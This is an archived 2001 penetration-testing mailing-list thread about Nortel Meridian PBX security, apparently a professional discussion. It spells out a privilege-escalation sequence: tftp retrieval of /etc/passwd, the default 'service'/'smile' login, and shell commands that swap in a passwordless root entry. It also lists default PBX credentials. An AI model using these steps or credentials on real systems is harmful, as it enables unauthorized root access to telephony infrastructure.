Penetration Testing mailing list archives
Re: Nortel Security
From: H D Moore <hdm () secureaustin com>
Date: Sat, 30 Jun 2001 12:54:05 -0500
If the PBX is hooked into the actual network, there are quite a few ways to get access to the system. The easiest method is to tftp the /etc/passwd file off the system and crack the hashes. If you go this route, you will get a user account called "service" with a password of "smile" ;) If you log into the system with this account, you will notice that /etc is mode 0777, so getting root access is trivial: $ echo "root::0:0:root:/root:/bin/sh" > /etc/mah_passwd $ mv /etc/passwd /etc/passwd.bak $ mv /etc/mah_passwd /etc/passwd $ su root # mv /etc/passwd.bak /etc/passwd I don't remember which version of this system it was, but the client software that came with it was called "Meridian Terminal Emulator". You could manage the PBX with this by first logging in with 0000/0000 then giving it the manager password of "9999". I really wish I had more time to write up the stuff I find out there... -HD On Saturday 30 June 2001 06:22 am, G A Evans wrote:
Try http://support.dialogic.com/ and search for meridian. There is quite a bit of programming information. You can also try a login of 0000 and password of 0000 for the Nortel Meridian 1 PBX OS Release 2. Tony Barnett abarnettremovethisbit () ndirect co uk
-------------------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- Re: Nortel Security Jason Ellison (Jul 01)
- <Possible follow-ups>
- RE: Nortel Security Mike . Ruscher (Jul 01)
- Re: Nortel Security H D Moore (Jul 01)
- Re: Nortel Security Mark Rowe (Jul 10)
- Re: Nortel Security h0pper (Jul 02)